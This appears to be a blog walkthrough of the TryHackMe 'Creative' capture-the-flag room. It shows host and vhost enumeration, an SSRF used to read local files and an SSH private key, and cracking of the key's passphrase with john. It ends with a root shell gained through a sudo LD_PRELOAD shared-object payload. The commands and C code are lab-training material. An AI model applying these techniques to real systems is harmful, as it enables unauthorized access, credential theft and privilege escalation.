wp-tryhackme-creative

Posted on In Views: Disqus: Word count in article: 332 Reading time ≈ 1 mins.
vhost&ssrf&so

creative Target IP Address 10.10.199.222

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36

❯ nmap -F 10.10.199.222
...
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http


❯ nmap -p80 -sV 10.10.199.222
...
PORT   STATE SERVICE VERSION
80/tcp open  http    nginx 1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# remember to remove
❯ vim /etc/hosts
...
10.10.199.222 creative.thm


# nothing
❯ gobuster dir -u http://creative.thm/ -w /usr/share/dirb/wordlists/big.txt
...
/assets               (Status: 301) [Size: 178] [--> http://creative.thm/assets/]
Progress: 20469 / 20470 (100.00%)

# scan subdomain
❯ gobuster vhost -u creative.thm -w ../tool/dic/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -t 50 --append-domain
...
Found: beta.creative.thm Status: 200 [Size: 591]
Progress: 4989 / 4990 (99.98%)

sudo vim /etc/hosts
10.10.199.222 beta.creative.thm

beta.creative.thm ssrf

install ssrfmap get request head and request body from browser

1
2
3
4
5
6
7
8

❯ python ssrfmap.py -r request.txt -p url -m portscan > output
...

cat output | grep open
	[05:49:06] IP:127.0.0.1   , Found open      port n°80
	[05:50:56] IP:127.0.0.1   , Found open      port n°1337

access ssrf get flag1 http://127.0.0.1:1337/home/saad/user.txt

get ssh key http://127.0.0.1:1337/home/saad/.ssh/id_rsa

open browser source code and copy to id_rsa

1
2
3
4
5
6
7
8
9
10
11
12
13
❯ ssh -i id_rsa saad@creative.thm
Enter passphrase for key 'id_rsa':

# need passphrase

❯ ssh2john id_rsa > hash

❯ john ./hash --wordlist=/usr/share/wordlists/passwords/rockyou.txt
...
sweetness        (id_rsa)
...

❯ ssh -i id_rsa saad@creative.thm
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
saad@m4lware:~$ cat .bash_history

...
echo "saad:MyStrongestPasswordYet$4291" > creds.txt
rm creds.txt
...

saad@m4lware:~$ sudo -l
[sudo] password for saad: # enter password
Matching Defaults entries for saad on m4lware:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,
    env_keep+=LD_PRELOAD # this is the important line
User saad may run the following commands on m4lware:
    (root) /usr/bin/ping

# use dynamic library

vim shell.c

cat shell.c
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

gcc -fPIC -shared -o shell.so shell.c -nostartfiles
ls -al shell.so

saad@m4lware:~$ sudo LD_PRELOAD=./shell.so ping
# whoami
root
# cat /root/root.txt
# get flag2